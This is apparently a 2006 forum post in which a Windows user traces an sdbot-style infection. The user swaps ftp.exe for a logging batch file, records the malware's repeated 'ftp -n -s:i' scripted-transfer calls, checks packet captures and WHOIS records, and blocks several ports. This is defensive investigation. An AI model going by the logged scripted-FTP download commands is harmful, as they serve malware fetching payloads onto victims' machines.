Throughout this thread, the "File and Printer Sharing for Microsoft Networks" has been un-checked for the dial-up connection, and there has not been any other network connection (net cable unplugged).

Deleted %windir%\system32\dllcache\ftp.exe
Renamed %windir%\system32\ftp.exe TO %windir%\system32\ftp_bak.exe
Created %windir%\system32\ftp.bat

.........................
%windir%\system32\ftp.bat
.........................
@echo off
echo %date:~4,10% %time:~0,8% %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 >> c:\foo.log

............
c:\foo.log
............
10/15/2006 1:09:29 ftp -n -s:i
10/15/2006 1:16:32 ftp -n -s:i
10/15/2006 1:30:58 ftp -n -s:i
10/15/2006 11:29:53 ftp -n -s:o
10/15/2006 11:32:55 ftp -n -s:o
10/15/2006 11:33:17 ftp -n -s:i
10/15/2006 11:33:42 ftp -n -s:o
10/15/2006 11:35:07 ftp -n -s:i
10/15/2006 17:11:16 ftp -n -s:i
10/15/2006 17:23:37 ftp -n -s:i
10/15/2006 21:48:45 ftp -n -s:i

...........
windump has
...........
21:48:28.387824 IP 221.208.208.90.32846 > walterh2.1027: UDP, length 459
21:48:28.387824 IP walterh2 > 221.208.208.90: ICMP walterh2 udp port 1027 unreachable, length 36

%windir%\system32\i appeared at 21:48:45

WHOIS Record For
221.208.208.90
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

WHOIS Record For
218.63.173.251
Record Type: IP Address

OrgName: Asia Pacific Network Information Centre
OrgID: APNIC
Address: PO Box 2131
City: Milton
StateProv: QLD
PostalCode: 4064
Country: AU

blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports

Control Panel -> Administrative Tools -> Local Security Policy -> IP Security Policies on Local Machine
.. Manage IP Filter Lists
.. Create IP Security Policy
.... Block inbound UDP 1025,1026,1027 and TCP 1025,445,135

Have not seen that sdbot for a while...